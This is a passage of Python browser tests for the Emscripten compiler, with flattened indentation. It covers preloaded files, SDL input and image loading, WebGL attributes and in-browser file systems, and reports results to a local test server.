os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
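# (test.data is then fetched from cdn/test.data rather than from the page's
# own directory; see the shutil.move into 'cdn' below)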
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT();
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''');
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
    // This code should never be executed, because the required dependency file is missing.
int result = 0;
REPORT_RESULT();
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
filePackagePrefixURL: "''' + assetLocalization + r'''",
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>'''
)
def test():
# test that a missing file runs xhr.onload with a status other than 200, 304 or 206
setup("")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test that an unknown protocol goes through xhr.onerror
setup("unknown_protocol://")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for filePackagePrefixURL
#open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http:/localhost:8888/cdn/", '))
#test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt'], manual_reference=True, post_build=self.post_manual_reftest)
def test_glgears_proxy(self):
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
original = open('test.js').read()
def copy(to, js_mod, html_mod = lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1']).communicate()
open('test.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('{{{ SCRIPT }}}', '<script src="test.js"></script>'))
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print delay, defines, emterps
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//Module.print('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//Module.print('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1'], manual_reference=True, post_build=post)
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-s', 'NO_EXIT_RUNTIME=1'], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1')
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1')
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
# JavaScript code to check support for the WebGL context attributes we want to test
# (request the attribute, create a context, and afterwards check its value in the context attributes).
# The tests also succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
def test_fflush(self):
return self.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
self.btest('test_fflush.cpp', '0', args=['-s', 'NO_EXIT_RUNTIME=1', '--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
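# (FS.syncfs(true, cb) pulls persisted IDBFS state into memory; the C side is
# presumably expected to call FS.syncfs(false, ...) to write its changes back)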
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'): os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
